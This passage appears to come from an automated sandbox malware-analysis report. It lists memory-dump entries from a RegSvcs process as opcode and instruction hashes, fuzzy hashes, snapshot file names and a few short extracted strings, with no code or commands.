                                  • Instruction Fuzzy Hash: FF616D317041159FDF28DF3AC884A6B77EABF88642705546AEA56CB3A5EF20DC11CB50
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 227d5409c1fe8dae57a16e16999a09eca888b6fd97a89079cf6880c66253bf71
                                  • Instruction ID: c0cc113fcdd677b3285a2acbf890b6c724ce04d358b93de5732cbdd271249886
                                  • Opcode Fuzzy Hash: 227d5409c1fe8dae57a16e16999a09eca888b6fd97a89079cf6880c66253bf71
                                  • Instruction Fuzzy Hash: A151DD79610240CFC31DEB28D948B1777B2BBC9714B65959AE801DB798EB31ED06CB81
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cee7e2a6d3c6977a0ee5f0720fc669742b679aa3d6c89bb89ebacb8b702b5c86
                                  • Instruction ID: 769fdcc4edcd143a01403ea06dfa3faa8dc7b9bf8076e2565b8b44e0fbecc659
                                  • Opcode Fuzzy Hash: cee7e2a6d3c6977a0ee5f0720fc669742b679aa3d6c89bb89ebacb8b702b5c86
                                  • Instruction Fuzzy Hash: 64513B71A10225DFCB18CF68C588A6ABBF1FF44314B168499E819AB3A1C730ED91CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1164255151abdbca12670444b1640543a7d25f9cb700ad11f77918aab09d2890
                                  • Instruction ID: 3eaa7a42a61777e6d12b81da87cf6e4db7b03f4ae069605b2f99947bbf607874
                                  • Opcode Fuzzy Hash: 1164255151abdbca12670444b1640543a7d25f9cb700ad11f77918aab09d2890
                                  • Instruction Fuzzy Hash: 614159756441559FCB29CF29D848A7A7BB2FF49312F1104A5EA02CB3A1CB31DC90CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37ab96dad5edc63ed1d405ff12ad4d5d5dad68b2ec916230bb6d483c5ac3195b
                                  • Instruction ID: 5a7e1ff3ee9e9104d205ccfd3a06c814f22e5c79c723d2e8d9439722c2089cb1
                                  • Opcode Fuzzy Hash: 37ab96dad5edc63ed1d405ff12ad4d5d5dad68b2ec916230bb6d483c5ac3195b
                                  • Instruction Fuzzy Hash: 3E31AC34318205CFDB2DCB25A894A3F7BAAFB94650B146956D053CB3E1DA24CC80EF82
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7a3c8c8920d2c45b5bc1560a09b2ad84c3e73f11da48b261f2f187a3fc4c219
                                  • Instruction ID: 4b4404966a313c6eb87fd69f9842df16af2c674a5d2408bce3280320078f35c9
                                  • Opcode Fuzzy Hash: d7a3c8c8920d2c45b5bc1560a09b2ad84c3e73f11da48b261f2f187a3fc4c219
                                  • Instruction Fuzzy Hash: C031B03560418AAFCB09AF64D858BBF7BA7FB89310F004019F91687384CB79CD61DB90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ed6130f9b29963f92d074495b109fb9f6325cda5e4ec8873939c4b3d494acdcf
                                  • Instruction ID: 6400ed41c8b01a8448d2a50ef0ec09180158841e9f344f7238e0ec82e1d9e66a
                                  • Opcode Fuzzy Hash: ed6130f9b29963f92d074495b109fb9f6325cda5e4ec8873939c4b3d494acdcf
                                  • Instruction Fuzzy Hash: 5C21E5303442514BDF3C66268498B3B369BBFC461AF149438DA06CB7D4DF66CC42D780
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd4c5fee456c8df661dec9685da9e991e8da0e4e8c6c0e11e8c6bb5674c5f54d
                                  • Instruction ID: 9047a62846cc3dd87317ee124b75b8d1125e95e89721b8518422cb9c29450566
                                  • Opcode Fuzzy Hash: cd4c5fee456c8df661dec9685da9e991e8da0e4e8c6c0e11e8c6bb5674c5f54d
                                  • Instruction Fuzzy Hash: 8121E53171021D9BD798AA39580933F6597F7C8330F94556AE90ADB390EA31DD42C7D2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea89add8c38996389767ed4124857a25a328cfdbc9f50547f4447a475ac872f8
                                  • Instruction ID: 9f88fe863ecac1633d41915668d6bbf1e2af216f0a8b72b7ffe6ee4e1154b3a3
                                  • Opcode Fuzzy Hash: ea89add8c38996389767ed4124857a25a328cfdbc9f50547f4447a475ac872f8
                                  • Instruction Fuzzy Hash: F0319570E041058FCB18CF6CC884AAFBBB6FF99310B158659E856AB3A1CB349D51CF90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2df28653afb1720b629f34a50d27d60c8697a61481f74cd38695ae31ef139d35
                                  • Instruction ID: 76568ae3dacddf1901d50cf557e93b5c0a5902a3e016b684dd9fc6ceab5bb735
                                  • Opcode Fuzzy Hash: 2df28653afb1720b629f34a50d27d60c8697a61481f74cd38695ae31ef139d35
                                  • Instruction Fuzzy Hash: D521E735B101048FCB48DB79D9949AEBBB7EBCC310B14906AE506EB3A1CA31DC05CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80f1d86746329df862457b16e19f2b434c31b43e9b1a115b06bb2933e9fcf6fa
                                  • Instruction ID: 7569bd8a5b46f22282e8ad80c41451ba6f741213bb233c7f74168a864e6c97b6
                                  • Opcode Fuzzy Hash: 80f1d86746329df862457b16e19f2b434c31b43e9b1a115b06bb2933e9fcf6fa
                                  • Instruction Fuzzy Hash: CC31F5316086C58FD70A9F68DC9876A7FB1FF56344F08449AE4458B392EBB8C916CB90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb126e4383d58c9fa1c0c1be0a15999343364b66ef19b693079d797e5b99349a
                                  • Instruction ID: 2c466fe6951e5b8959aca7b11d5c7e6ff5c069235f54e2e58a83b98de0ac155e
                                  • Opcode Fuzzy Hash: fb126e4383d58c9fa1c0c1be0a15999343364b66ef19b693079d797e5b99349a
                                  • Instruction Fuzzy Hash: 3F21A135B101048FCB48DB69D4949AEBBFBABCD710F15906AE506EB3A1DA31EC05CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04b3fc7fbb8de9e8cc87f571351fdae33e6b76a70cd7b787c8624ccb793e9e13
                                  • Instruction ID: f2b41ff072b045255cc0693db5f43c519be8c93dbe24aea82595759e05f899be
                                  • Opcode Fuzzy Hash: 04b3fc7fbb8de9e8cc87f571351fdae33e6b76a70cd7b787c8624ccb793e9e13
                                  • Instruction Fuzzy Hash: 6421AE387002019FD748EBB5E998B2B77AAFBC4910B104969D905C7294EF35DC00CBA0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78cfb74578d4cf7581adaddb81d9a82fd1fa351058ed77b3258700092f596e6a
                                  • Instruction ID: cac80a9888728e5a1972f0523348266af92892a368f219aafd767ca001f5155c
                                  • Opcode Fuzzy Hash: 78cfb74578d4cf7581adaddb81d9a82fd1fa351058ed77b3258700092f596e6a
                                  • Instruction Fuzzy Hash: 2C21FD3565418A9FCB08AF68D84CB6B7BA6FB85714F00446AE9068B384CB78CC65CBD0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e908dcb11fb1467daef873592df25489cbd0c059a3362666be8c8455554f977e
                                  • Instruction ID: 01acd43f0413153dc0dc06aeea61aac07401ae84958d12057ed692b98a00b61d
                                  • Opcode Fuzzy Hash: e908dcb11fb1467daef873592df25489cbd0c059a3362666be8c8455554f977e
                                  • Instruction Fuzzy Hash: 3821C475A012098FDB04CF94C9809DEFBF6FF89310F1486A9D906AB344EB70AD85CB90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35b7d33808865db386253d07c61c998b741295ffd67252b5e4ae7869b4a0dc91
                                  • Instruction ID: 116c3dd0b0e6f5435bfcd3b8be791f0f615b7dd9b23df6ece312e97070b6c203
                                  • Opcode Fuzzy Hash: 35b7d33808865db386253d07c61c998b741295ffd67252b5e4ae7869b4a0dc91
                                  • Instruction Fuzzy Hash: EF118F30B142049BEB1C9A7AD814A7B76ABBBC4710F049529E816C7781EB30CD91C7D0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97657f1509cdb152faa76a46ab90a84ec86044d1c582d8e2b328fc881901182d
                                  • Instruction ID: beba4c6b1f10b1cfdcedaff18fbe5b808522d16d4b11c73ad07ad7e0f63531c5
                                  • Opcode Fuzzy Hash: 97657f1509cdb152faa76a46ab90a84ec86044d1c582d8e2b328fc881901182d
                                  • Instruction Fuzzy Hash: 6E012832B001556BCB09DE69D818BAF3BDBEFC8B40F148069F905D7280DA71C811DB90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f28621c0a5a36111d6207fb23077489d2c936abcf2b8d97c8172b61fc954a2ae
                                  • Instruction ID: 5eb8277da51e342d490137f22553b8f3fdfd6ef6c62a3a6bf30e73aa757fab63
                                  • Opcode Fuzzy Hash: f28621c0a5a36111d6207fb23077489d2c936abcf2b8d97c8172b61fc954a2ae
                                  • Instruction Fuzzy Hash: 8B1112B58003498FCB20DF9AC588BDEBBF4FB48724F208419D519A3740C379A944CFA1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c03f956177e86c3b8cca1feac51c84c20f4dd033d11cdf0584315d3f4ca811ab
                                  • Instruction ID: c96def3d5f4833bc14b18789cd7f87045ed74410caa1f76714793a7ae8ac82c1
                                  • Opcode Fuzzy Hash: c03f956177e86c3b8cca1feac51c84c20f4dd033d11cdf0584315d3f4ca811ab
                                  • Instruction Fuzzy Hash: 9E11F3B58003498FDB20DF9AC484BDEBBF4FB48724F208419D519A7750C779A944CFA5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c39fe158149a2325c3cf1b0cd3c4fe4532a1eb863f0f83840a2574d0cfc6103d
                                  • Instruction ID: 133dcb997f91b7c044695b752be6c6971813946585b85a15df9bab1c00fe188d
                                  • Opcode Fuzzy Hash: c39fe158149a2325c3cf1b0cd3c4fe4532a1eb863f0f83840a2574d0cfc6103d
                                  • Instruction Fuzzy Hash: DBF0EC75719205AFE70D5271AC109F76A27BBE1341F145022E501C73A3D721CD96C360
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61ee80dfb0efce9b6789bd0efd8955857843509d1226862112b050d9410c533
                                  • Instruction ID: 7d67a5a7fbe33946ab23b8d0f6d6f511eafcd281bebe801076b6de8ce47e6fa1
                                  • Opcode Fuzzy Hash: c61ee80dfb0efce9b6789bd0efd8955857843509d1226862112b050d9410c533
                                  • Instruction Fuzzy Hash: D3F031743402409FD368EF24D998F1677B6FBC9724F628294E5259F7E4CB70AC018751
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e342bd9973fc2d41f301fa566336c237bc0987072f774878577236e8e127a883
                                  • Instruction ID: 5de503ac055bdc2159077d44de18a081b74cc17b4a900e1d6bcee55d34e95f7e
                                  • Opcode Fuzzy Hash: e342bd9973fc2d41f301fa566336c237bc0987072f774878577236e8e127a883
                                  • Instruction Fuzzy Hash: 2FE0E531B5011897C74C1678A8002AA75DAA3C5631F008B27D41EC3698DE608D51C344
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ebe10d33c66f55eaae5fdca2d9a25a997eefc6a6c84b857c672e8d72de646be
                                  • Instruction ID: 394ed67fbc6ce60b74fc8bb7ac7d8290600916bf022dafc203d9c85d5ece6e7d
                                  • Opcode Fuzzy Hash: 4ebe10d33c66f55eaae5fdca2d9a25a997eefc6a6c84b857c672e8d72de646be
                                  • Instruction Fuzzy Hash: 07E08C22B5112993D78C557DA80456BB9CFA3CA671B50D937E90EC7B8CDE60CC2183D9
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7488d64581e3abc06c2b70a7d2f17ce19fd96cf611ea0234958127a2bac8411c
                                  • Instruction ID: 3bb550cc902cb7dd94b7383a7e1cd68ab3411ea3dd3fa8539a26ce48fc3bcbb9
                                  • Opcode Fuzzy Hash: 7488d64581e3abc06c2b70a7d2f17ce19fd96cf611ea0234958127a2bac8411c
                                  • Instruction Fuzzy Hash: F5E0263222006C97E648D968A905B53325FE384735F40A826E11AC7304CA7089618392
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7c6265f1e7c1461dee21e0dec17f58642e8bf85e7b1faf81245ba816cc430bd
                                  • Instruction ID: a2342f30dc2cc3ab34ca2c25ffdc3c0d3752e8e9f3eee37f0f1e096b2f9bb589
                                  • Opcode Fuzzy Hash: f7c6265f1e7c1461dee21e0dec17f58642e8bf85e7b1faf81245ba816cc430bd
                                  • Instruction Fuzzy Hash: 5FE0D8357045014B876CAB24646903673B7EBC820034184778806D77C8CF30AE838B83
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36eea6b0e6e747dfe61c5d3b0d35d382343a3906a993742d7d29d089a8ac6e05
                                  • Instruction ID: 1b9f4c29c665534e2d3c8a8ff6682f56ccbd4a6ddba80956e3468e5416da7930
                                  • Opcode Fuzzy Hash: 36eea6b0e6e747dfe61c5d3b0d35d382343a3906a993742d7d29d089a8ac6e05
                                  • Instruction Fuzzy Hash: 85D02B3235006D57E648546D590A667750F97C5771B80B477E51ACB344C9508D2182D6
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e20daff0d37c760f730d14fa8fc443baec6af758592cd08794c0dc57f65ea26
                                  • Instruction ID: a67fa544be99390a8e2c2c8ac5f2e9d4a8d9eee4f27afad02f25709c7905a059
                                  • Opcode Fuzzy Hash: 8e20daff0d37c760f730d14fa8fc443baec6af758592cd08794c0dc57f65ea26
                                  • Instruction Fuzzy Hash: 62E086347040004B876CE724956802A7277ABC820034280368812C7B8CDF309D828B83
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27bf624603a04d6c26aa151f63642c2191d49c37d95fde85c430d5b14dc3d72c
                                  • Instruction ID: dee442b054112147f27ab77c853ac3c5e4f0d7c7a8e5d2b7f28344ab1fc2d641
                                  • Opcode Fuzzy Hash: 27bf624603a04d6c26aa151f63642c2191d49c37d95fde85c430d5b14dc3d72c
                                  • Instruction Fuzzy Hash: 5BE08CB1B002069B9709DF7981A126FB5AB7BC8400340C579C92AEB380EF74D924EBC2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ff331b86e86604f083fe007e36a6ac971116db4d426a35934e470918da01ece
                                  • Instruction ID: da08e76be2dcc10c831864a3ae4a7eedd04fa3e6606ebf5f0136232b24525720
                                  • Opcode Fuzzy Hash: 1ff331b86e86604f083fe007e36a6ac971116db4d426a35934e470918da01ece
                                  • Instruction Fuzzy Hash: 46D0673AF40008AFCB049F99E8449DDF776FB98221B04C556F916A3260C6319965DB60
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7616d7d01aa4861cfab7018d2aaaf67ec079f91db6d84d9de7d3b7c343535ec
                                  • Instruction ID: b596e3f57ddf4bd7dfd41f2b8c98ab6379c97572fd8750aca601359c99dea4d7
                                  • Opcode Fuzzy Hash: a7616d7d01aa4861cfab7018d2aaaf67ec079f91db6d84d9de7d3b7c343535ec
                                  • Instruction Fuzzy Hash: 23D01774A101009FC75CEB30E51C919BBB5AB89610351946A9812CBBA4DB309E40CB01
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b36a0fe8f300a26059c6bc0587521841272d6a537c8299a96223e9783ef3d9c0
                                  • Instruction ID: 079474be32ef06e2d5517bd8b85798beca85feca6999bd672977790f897a710b
                                  • Opcode Fuzzy Hash: b36a0fe8f300a26059c6bc0587521841272d6a537c8299a96223e9783ef3d9c0
                                  • Instruction Fuzzy Hash: 88C012384103498BD645F765FD5C715377EB6C0905740D61194094A10DDF749C594F91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8:|q$fei
                                  • API String ID: 0-456817884
                                  • Opcode ID: cdd8b4623a57fb488cf0654d2e128ee5a2fa6d58430588f62afb7163938fce6d
                                  • Instruction ID: f014b78b76b100b6a8a7147b5456a69acdcfed5c1c702f78441d6dd722dedceb
                                  • Opcode Fuzzy Hash: cdd8b4623a57fb488cf0654d2e128ee5a2fa6d58430588f62afb7163938fce6d
                                  • Instruction Fuzzy Hash: 94A1BD30A142548FCB94CB29C880A7FFBF2AFC9304B19D9AAE25AD7654C734EC45CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^nQ$ykk.
                                  • API String ID: 0-2113457234
                                  • Opcode ID: 6bfe94805ad8eab39a8e8091156d0df1a69c7bb26350d96153db00a38c10d638
                                  • Instruction ID: 6545401b49a02a2b75342dc5861288aca202884aa862893cbf9b163977b5b8cf
                                  • Opcode Fuzzy Hash: 6bfe94805ad8eab39a8e8091156d0df1a69c7bb26350d96153db00a38c10d638
                                  • Instruction Fuzzy Hash: BEA17034B01115CFE7ACEB64C964BAAB777BB89301F1080AAD50AAB785DB319D81CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 9(#
                                  • API String ID: 0-2779937032
                                  • Opcode ID: 445609ae2cb9c0509b2184decb3417429e643984e441e984c51efb7bac974e08
                                  • Instruction ID: 23c06406e6c24ae94d4b59d0a11f2325de48097abff39370ddca4e941c2ef1e0
                                  • Opcode Fuzzy Hash: 445609ae2cb9c0509b2184decb3417429e643984e441e984c51efb7bac974e08
                                  • Instruction Fuzzy Hash: B4E1E130B042548FCB49CB69D59066FFBF2EFCA210B1585AAD656EB355C730EC49CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $>f
                                  • API String ID: 0-2253003967
                                  • Opcode ID: c8847672d8647c63dff23bca15f19f7d752852387186714050706a18fc895e88
                                  • Instruction ID: 38f6c6f89eed5721471d5e57853260fb83e62b8f1c59ff469866a5023113ac6b
                                  • Opcode Fuzzy Hash: c8847672d8647c63dff23bca15f19f7d752852387186714050706a18fc895e88
                                  • Instruction Fuzzy Hash: A6E16030A10215CFDB58DF64D894BAAB7B6BF89300F1095AAD50AAB391DB319E85CF41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8:|q
                                  • API String ID: 0-2578389060
                                  • Opcode ID: 8a034ec44066952d3154ed809a70d19eb36b525272eb0eccbaf0636ef3596a2b
                                  • Instruction ID: cb6fec89475f3d5e37fe3113a569abbe11c3effe8f518ccc629d63d9e115af9c
                                  • Opcode Fuzzy Hash: 8a034ec44066952d3154ed809a70d19eb36b525272eb0eccbaf0636ef3596a2b
                                  • Instruction Fuzzy Hash: 24A1D130A142548FC795CB29C480A7FFBF2AFC9304B15D9AAE25AE7655C734EC85CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: \VNn
                                  • API String ID: 0-207492048
                                  • Opcode ID: d9a0c8206b56abe283e54a5e482e7ae0e5bcc5978c1db0274b5591e0d102b9b5
                                  • Instruction ID: f69f3f901a64b9aa0d590a02301a841435d630b76dc6432c6604b312ba943de4
                                  • Opcode Fuzzy Hash: d9a0c8206b56abe283e54a5e482e7ae0e5bcc5978c1db0274b5591e0d102b9b5
                                  • Instruction Fuzzy Hash: 0B916B71E00209CFDB64DFA9C8847DEBBF2EF88708F148569E514A7294EB349849CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ykk.
                                  • API String ID: 0-690924392
